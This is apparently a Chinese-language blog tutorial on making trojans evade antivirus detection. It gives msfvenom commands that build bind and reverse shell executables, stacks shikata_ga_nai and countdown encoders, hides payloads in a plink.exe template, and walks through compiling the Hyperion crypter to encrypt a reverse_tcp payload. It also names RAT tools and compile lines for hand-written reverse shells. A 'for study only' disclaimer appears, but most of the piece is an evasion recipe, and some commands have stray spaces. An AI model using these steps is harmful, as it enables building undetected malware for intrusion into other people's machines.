木馬免殺(繞過殺軟)

僅用於學習交流
免殺是一個滲透測試中最苦惱的環節,也是一個需要學習很久的部分。
利用kali生成的木馬存在的問題就是無法避免市面上大多數的殺軟,及時利用kali自帶的免殺也無法達到很好的免殺效果。

免殺技術
1.修改二進制文件中的特徵字符
替換、擦除、修改
2.加密技術
通過加密方式使得特徵字符不可讀,從而逃避殺軟檢測
運行時分片分段的解密執行,注入進程或殺軟不檢查的無害文件中
3.防殺軟的檢測
惡意程序本身的特徵字符
加密器crypter的特徵字符

當前的現狀
1.編寫私有的RAT軟件,避免普遍殺軟所知的特徵字符
2.使用獨有crypter軟件加密惡意程序
3.儘可能小範圍使用,避免被發現
4.直接修改特徵碼(最直接的方式)

常用的RAT軟件
灰鴿子、波爾、黑暗彗星、潘多拉、NanoCore

生成反彈shell
msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -a x86 -platform win -f exe -o a.exe

加密編碼反彈shell
msfvenom -p windows/shell/bind_tcp lhost=1.1.1.1 lport=4444 -f raw -e x86/shikata_ga_nai -i 5 | msfvenom -a x86 --platform windows -e x86/ countdown -i 8 -f raw | msfvenom -a x86 --platform windows -e x86/ shikata_ga_nai -i 9 -b ‘\x00’ -f exe -o a.exe

利用模板隱藏shell
msfvenom -p windows/shell_reverse_tcp -x /usr/share/windows-binaries/ plink.exe lhost=1.1.1.1 lport=4444 -a x86 --platform win -f exe -o a.exe

msfvenom -p windows/shell/bind_tcp -x /usr/share/windows-binaries/ plink.exe lhost=1.1.1.1 lport=4444 -e x86/shikata_ga_nai -i 5 -a x86 -platform win -f exe > b.exe

Hyperion(32bit PE加密程序)
– Crypter / Container(解密器+PE Loader)
– https://github.com/nullsecuritynet/tools/raw/master/binary/hyperion/release/ Hyperion-1.2.zip
– unzip Hyperion-1.2.zip
– cd Hyperion-1.2 && i686-w64-mingw32-g++ -static-libgcc -static-libstdc++ Src/Crypter/*.cpp -o h.exe
– dpkg --add-architecture i386 && apt-get update && apt-get install wine32
– msfvenom -p windows/shell/reverse_tcp lhost=192.168.1.15 lport=4444 -platform win -e x86/shikata_ga_nai -a x86 -f exe -o a.exe
– wine h.exe a.exe b.exe

自己編寫後門
Windows reverse shell – wine gcc.exe windows.c -o windows.exe -lws2_32
Linux shell – gcc linux_revers_shell.c -o linux

免殺只是一種瞭解殺軟流程之後的應對方式,文章僅用於交流,免殺的方法很多,文中提及的只是最普及的方式,入門只需要使用免殺加密或者修改特徵字符即可,kali自帶的免殺效果也不錯,在實驗環境中進行測試已經足夠。免殺只是手段,不是惡意攻擊的方式。

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章